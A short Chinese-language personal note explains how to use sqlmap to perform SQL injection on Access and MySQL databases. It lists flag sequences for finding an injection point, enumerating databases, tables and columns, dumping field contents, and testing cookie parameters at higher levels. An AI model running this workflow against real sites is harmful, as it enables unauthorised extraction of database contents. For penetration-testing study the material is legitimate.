利用sqlmap进行Access和Mysql注入
- 2020 年 4 月 5 日
- 笔记
sqlmap将检测结果保存到C:UsersAdministrator.sqlmapoutput (windows)
linux:(/root/.sqlmap/output)
Access注入
1.检测是否存在注入点
2.–tables 检测表名
3.–columns -T “表名”检测那个表中的字段
4.–dump -C "字段名" -T ”表名“ 检测那个表中那个字段中的内容
mysql注入
1.检测是否存在注入点
2.–dbs 当前所有数据库
3.–current -db 当前正在使用的数据库
4.–current -user 检测当前用户
5.–version 检测版本信息
6.–is-dba 检测当前用户是否为数据库管理员
7.以后步骤依照Access注入,-D 指定数据库
Cookie注入
1.检测注入点 –cookie "id=16"–level 2
level 最多5级 risk 最多三级
level 指定探测等级
level 1, 探测GTE,POST
level 2 探测Cookie数据
2.–cookie “id=16”–level 2 –tables 检测表名
3.–cookie “id=16”–level 2 –columns -T "表名“ 检测那个表中的字段名
4.–cookie “id=16”–level 2 –dump -C ”那个字段“ -T "表名“ 检测那个表中那个字段中的内容
【本人不保证技术的实用性,一切文章仅供参考,如有谬错,请留言】
